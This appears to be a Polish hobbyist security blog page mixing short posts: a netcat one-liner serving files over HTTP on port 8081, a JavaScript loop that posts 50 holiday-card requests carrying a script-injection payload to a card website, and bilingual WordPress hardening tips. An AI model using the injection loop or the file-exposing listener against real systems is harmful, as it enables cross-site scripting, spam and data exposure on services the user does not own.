wtorek, 26 czerwca 2012

czwartek, 21 czerwca 2012

Why you something more than that?

:;while [ $? -eq 0 ];do nc -vlp 8081'(r=read;e=echo;$r a b c;z=$r;while [ ${#z} -gt 2 ];do $r z;done;f=`$e $b|sed "s#^/##g;s#/$""##g"`;h="HTTP/1.0";o="$h 200 OKrn";c="Content";if [ -z "$f" -o -d "$f" ];then($e $o;$e "Parent Directory";if [ $f ];then f=$f/;fi;cd "$f";ls|(while $r n;do if [ -e "$n" ]; then $e "`ls -ghd $n`";fi;done););cd ->/dev/null;elif [ -f $f ];then $e "$o$c-Type: `file -ib $f`n$c-Length: `stat -c%s $f`";$e;cat $f;else $e -e "$h 404 Not Foundnn404 $fn";fi)';done

środa, 4 kwietnia 2012

Internetowe kartki świąteczne

for (i=0;i<=50;i++) {
var http = new XMLHttpRequest();
var url = "wyslij.php";
var params = "beret=8&atrybuty=1&usta=1&oczy=1&zyczenia=
POPRAW KARTKE!<script>document.cookie</script>&wyslane=&nadawca_email=
undefined&nadawca_imie=undefined&email1=xxxx@xxx.pl&imie1=undefined
&liczba_adresatow=1";

http.open("POST", url, true);

//Send the proper header information along with the request
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-length", params.length);
http.setRequestHeader("Connection", "close");

http.onreadystatechange = function() {//Call a function when the state changes.
 if(http.readyState == 4 && http.status == 200) {
  alert(http.responseText);
 }
}
http.send(params);
}


Kartki świąteczne :)

OWASP Top 10 Tools and Tactics - article

OWASP Top 10 Tools and Tactics - you must read this article, if you’ve spent any time defending web applications as a security analyst, or perhaps as a developer seeking to adhere to SDLC practices, you have likely utilized or referenced the OWASP Top 10.

poniedziałek, 26 marca 2012

Convert ascii string to hex | String to hex

Convert ascii string to hex
What's this? commandlinefu.com is the place to record those command-line gems that you return to again and again.

The security of your wordpress | Bezpieczeństwo wordpress-a

WordPress security tips that could save your site  | Kilka prostych zasad jak zabezpieczy Wordpress.

Think, think, think.


  1. Don’t use ‘admin’ username | nie używaj domyślnej nazwy dla administratora
    SQL:UPDATE wp_users SET user_login = 'your_new_login' WHERE user_login = 'admin';
  2.  Install Login LockDown Plugin | zainstaluj plugin LockDown
    Plugin umożliwia powstrzymanie ataków typu Brute Force.
  3. Install Secure WordPress plugin | zainstaluj plugin Secur
    Plugin umożliwia usunięcie/zaciemnienie informacji dot. wersji twojego Wordpress-a co może znacznie utrudnić atakującemu próbę ataku.
  4. Move your wp-config.php file | przenieś swój plik wp-config.php
    Przenosząc swój plik konfiguracyjny do folderu chronionego, uniemożliwiasz podgląd konfiguracji dostępu do DB itd..
  5. Change database table prefixes | zmień prefix tabel swojego Wodpress-a
    Domyślnie WordPress używa prefix-a dla tabel wp_.
  6.  Change default secret keys | zmień domyślne secret keys
    W pliku wp-config.php są przetrzymywane domyślne:
    define('AUTH_KEY', '');
    define('SECURE_AUTH_KEY', '');
    define('LOGGED_IN_KEY', '');
    define('NONCE_KEY', '');
  7. WordPress Update | staraj się uaktualniać swojego WordPress-a
    WordPress uprościł update swojego projektu do kilku kliknięć, walcz ze swoim lenistwem jeżeli nie chcesz później mieć problemów...
  8. Apache Password Protection for WordPress (.htaccess) | chroń swoje pliki
    Zabezpiecz wp-admin, wp-includes i wp-content, wtyczki, itp przy pomocy.
    Poczytaj
     
  9. Use strong password | Używaj silnych haseł
    Używając trudnych haseł uniemożliwiasz szybkie ich odgadnięcie, to nie powstrzymuje nikogo natomiast utrudnia działania.

  10. Backup your data regularly | Twórz kopie zapasową!
    To nie zabezpieczenie tylko dobra rada, ile więcej czasu zaoszczędzisz przywracając WordPress niż robiąc to od nowa? :)